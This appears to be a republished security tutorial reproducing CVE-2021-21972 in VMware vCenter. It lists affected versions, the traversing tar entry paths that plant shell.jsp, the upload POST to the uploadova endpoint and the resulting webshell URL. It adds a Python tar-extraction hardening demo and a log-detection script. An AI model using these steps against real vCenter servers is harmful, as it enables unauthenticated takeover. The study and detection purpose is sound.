
Reproducing CVE-2021-21972: unauthenticated arbitrary file upload in VMware vCenter

2025-04-05 update. From: SLTechnology News&Howtos, Network Security


Shulou (Shulou.com) 05/31 report

This article walks through reproducing CVE-2021-21972, the unauthenticated arbitrary file upload in VMware vCenter Server. The editor found it practical and shares it here; follow along below.

VMware vCenter unauthenticated arbitrary file upload (CVE-2021-21972)

I. Brief description of the vulnerability

VMware is a vendor of cloud infrastructure and business mobility products built on its virtualization platform; vCenter Server is the central management service for vSphere environments.

Severity: critical.

CVE-2021-21972 is a remote code execution vulnerability in the vSphere Client (HTML5) component of VMware vCenter Server, specifically in the bundled vRealize Operations (vROps) plugin. An attacker with network access to port 443 can send a crafted request without any authentication, write arbitrary files on the vCenter appliance, execute code as the vsphere-ui service account, and take control of vCenter.

The root cause is an unauthenticated arbitrary file upload: the endpoint accepts a tar archive and unpacks it without validating member names, so entries containing ../ are written outside the intended extraction directory.

The affected endpoint is:

/ui/vropspluginui/rest/services/uploadova

Full URL:

https://ip:port/ui/vropspluginui/rest/services/uploadova

II. Affected versions

VMware vCenter Server 7.0 series < 7.0 U1c
VMware vCenter Server 6.7 series < 6.7 U3l
VMware vCenter Server 6.5 series < 6.5 U3n
VMware ESXi 7.0 series < ESXi70U1c-17325551
VMware ESXi 6.7 series < ESXi670-202102401-SG
VMware ESXi 6.5 series < ESXi650-202102101-SG

Note that the ESXi builds listed above come from the same VMware advisory (VMSA-2021-0002) but address the OpenSLP issue CVE-2021-21974; CVE-2021-21972 itself affects vCenter Server only, since the vulnerable plugin ships with the vSphere Client.

III. Environment preparation and reproduction

Install ESXi 7.0.0 (VMware vSphere Hypervisor):
Download: https://cld16.irans3.com/dlir-s3/VMware-VMvisor-Installer-7.0.0-15843807.x86_64.iso
File: VMware-VMvisor-Installer-7.0.0-15843807.x86_64.iso, 350 MB
MD5: 220d2e87290f50c3508214cadf66b737
SHA1: 7fda0401ee1b2f49aae89043f9b2d509cf7e25db
Installation guide: https://blog.51cto.com/10802692/2409826

Download and install vCenter Server (VCSA):
Download: https://cld5.irans3.com/dlir-s3/VMware-VCSA-all-7.0.0-15952498.iso
File: VMware-VCSA-all-7.0.0-15952498.iso, 6.42 GB
MD5: 94bb30ae83cd5f12e2eecce114d43007
SHA1: 17aa2b1ee20e977fb4f8f8391563f57c3e456361
Installation guide: https://blog.csdn.net/qq_38028248/article/details/107712839

(Environment setup reference: the deployment notes by the author print("").)

midi.tar: reply "vmware" to the public account to obtain it.

midi.tar contains two entries whose names start with ../../. The service unpacks the upload into a scratch directory under /tmp, so two ../ components reach the filesystem root and the entries land inside the deployed vSphere UI webapp rather than in the extraction directory:

drwxr-xr-x root/root  ../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/42/0/h6ngc.war/resources/
-rw-r--r-- root/root  ../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/42/0/h6ngc.war/resources/shell.jsp

The numeric directory under deployer/s/global/ (42 here) is not fixed; it differs between installations and restarts, so a tar built for one appliance is not guaranteed to land on another without adjusting that path.
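To make the mechanism behind the midi.tar listing concrete, here is an added example (not code from the article or from VMware) that builds a tar whose member name contains ../, runs it through the naive "join the member name onto the destination and write" pattern that the vulnerable service used, and then through a hardened extractor that resolves every member path and refuses the archive if any member escapes. The destination directory name unicorn_ova_dir, the member names and the JSP placeholder content are all constructed for the demo; it writes only inside a temporary directory.

```python
import io
import os
import tarfile
import tempfile

# Constructed demo archive: one benign entry and one that mirrors the shape of
# the page's midi.tar entries (a "../" prefix). Contents are placeholders.
DEMO_ENTRIES = {
    "ova/disk.vmdk": b"not a real disk image",
    "../escaped/shell.jsp": b'<% out.println("jsp placeholder"); %>',
}


def build_tar(entries):
    """Pack {member_name: bytes} into a tar; names are stored verbatim, so '../' survives."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, data in entries.items():
            info = tarfile.TarInfo(name=name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def naive_extract(tar_bytes, dest):
    """The vulnerable pattern: join each member name onto dest and write, with no path check.
    Returns the real paths that were actually written."""
    written = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tar:
        for member in tar.getmembers():
            if not member.isfile():
                continue
            target = os.path.join(dest, member.name)
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as fh:
                fh.write(tar.extractfile(member).read())
            written.append(os.path.realpath(target))
    return written


def unsafe_members(tar_bytes, dest):
    """Member names that would resolve outside dest, plus links (which can redirect later writes)."""
    root = os.path.realpath(dest)
    bad = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tar:
        for member in tar.getmembers():
            target = os.path.realpath(os.path.join(root, member.name))
            if member.issym() or member.islnk() or os.path.commonpath([root, target]) != root:
                bad.append(member.name)
    return bad


def safe_extract(tar_bytes, dest):
    """Hardened form: reject the whole archive if any member escapes dest."""
    bad = unsafe_members(tar_bytes, dest)
    if bad:
        raise ValueError("refusing archive with escaping members: %r" % bad)
    return naive_extract(tar_bytes, dest)


def demo(entries=DEMO_ENTRIES):
    """Run both extractors against the demo archive inside a scratch directory."""
    tar_bytes = build_tar(entries)
    with tempfile.TemporaryDirectory() as scratch:
        dest = os.path.join(scratch, "unicorn_ova_dir")  # constructed destination name
        os.makedirs(dest)
        root = os.path.realpath(dest)
        flagged = unsafe_members(tar_bytes, dest)
        written = naive_extract(tar_bytes, dest)
        escaped = [p for p in written if os.path.commonpath([root, p]) != root]
        try:
            safe_extract(tar_bytes, dest)
            refused = False
        except ValueError:
            refused = True
    return {
        "flagged": flagged,
        "escaped_writes": len(escaped),
        "safe_extract_refused": refused,
    }


if __name__ == "__main__":
    print(demo())
```

The check in unsafe_members is the one that was missing: resolve the joined path with realpath and require that the destination is a prefix of the result, and treat symlink and hardlink members as hostile because a link written first can redirect a later member's write even when its own name looks clean.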

Upload the archive to the endpoint:

POST /ui/vropspluginui/rest/services/uploadova HTTP/1.1
Host: ip:port
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36

The Content-Type above is only what the captured header showed; the endpoint actually expects a multipart form body in which the tar is carried in the file field named uploadFile, so a client that sends the archive as a form-urlencoded body will not be processed.

A response body of SUCCESS confirms that the tar was accepted and unpacked.

Because the JSP was written into the resources directory of the deployed vSphere UI webapp, it is served directly by the vsphere-ui service. Access the shell at:

https://127.0.0.1/ui/resources/shell.jsp

Connect to the webshell and run commands (the original shows these steps as screenshots). Commands execute as the vsphere-ui service account on the appliance.
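For the defensive side of the procedure above, here is an added detection example (not from the article or from VMware) that scans web-server access-log lines for the two observable steps of this chain: an unauthenticated POST to the uploadova endpoint and a subsequent request for a .jsp file under /ui/resources/, then correlates the two by client IP. The log lines are constructed in Apache/Tomcat combined-log style; the assumption is that the vsphere-ui access log, or a reverse proxy in front of it, records requests in a compatible format, and the client addresses are documentation ranges.

```python
import re
from collections import defaultdict

UPLOAD_ENDPOINT = "/ui/vropspluginui/rest/services/uploadova"
RESOURCES_PREFIX = "/ui/resources/"

# Constructed sample log, combined-log style; not a real capture.
SAMPLE_LOG = """\
203.0.113.7 - - [24/Feb/2021:10:15:01 +0000] "POST /ui/vropspluginui/rest/services/uploadova HTTP/1.1" 200 7 "-" "python-requests/2.25.1"
203.0.113.7 - - [24/Feb/2021:10:15:03 +0000] "GET /ui/resources/shell.jsp?cmd=id HTTP/1.1" 200 118 "-" "Mozilla/5.0"
192.0.2.10 - - [24/Feb/2021:10:16:40 +0000] "GET /ui/ HTTP/1.1" 200 3521 "-" "Mozilla/5.0"
192.0.2.10 - - [24/Feb/2021:10:16:41 +0000] "GET /ui/resources/vmware-ui.css HTTP/1.1" 200 9012 "https://vc/ui/" "Mozilla/5.0"
192.0.2.11 - - [24/Feb/2021:10:20:00 +0000] "GET /ui/login HTTP/1.1" 200 15 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify(method, target):
    """Map one request to a rule name, or None. Query strings are ignored for matching."""
    path = target.split("?", 1)[0]
    if method == "POST" and path == UPLOAD_ENDPOINT:
        return "uploadova-post"
    if path.startswith(RESOURCES_PREFIX) and path.lower().endswith(".jsp"):
        # The webapp's resources directory holds static assets; a JSP there is foreign.
        return "jsp-under-ui-resources"
    return None


def detect(log_text):
    """Return one hit per log line that matches a rule; unparseable lines are skipped."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        rule = classify(m["method"], m["target"])
        if rule:
            hits.append({
                "ip": m["ip"],
                "ts": m["ts"],
                "rule": rule,
                "target": m["target"],
                "status": int(m["status"]),
            })
    return hits


def correlate(hits):
    """IPs that both posted an upload and fetched a JSP: the complete CVE-2021-21972 chain."""
    by_ip = defaultdict(set)
    for h in hits:
        by_ip[h["ip"]].add(h["rule"])
    wanted = {"uploadova-post", "jsp-under-ui-resources"}
    return sorted(ip for ip, rules in by_ip.items() if wanted <= rules)


if __name__ == "__main__":
    found = detect(SAMPLE_LOG)
    for h in found:
        print(h["ts"], h["ip"], h["rule"], h["target"])
    print("chain observed from:", correlate(found))
```

Either rule on its own is worth an alert: the upload endpoint required no authentication and has essentially no legitimate traffic, and a 200 for a .jsp under /ui/resources/ means a file is being served that the product does not ship there. The correlation only raises confidence when both appear from the same source.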

That is the full reproduction of the CVE-2021-21972 unauthenticated arbitrary file upload in VMware vCenter. The editor expects some of these points to come up in daily work; for more details, follow the industry information channel.
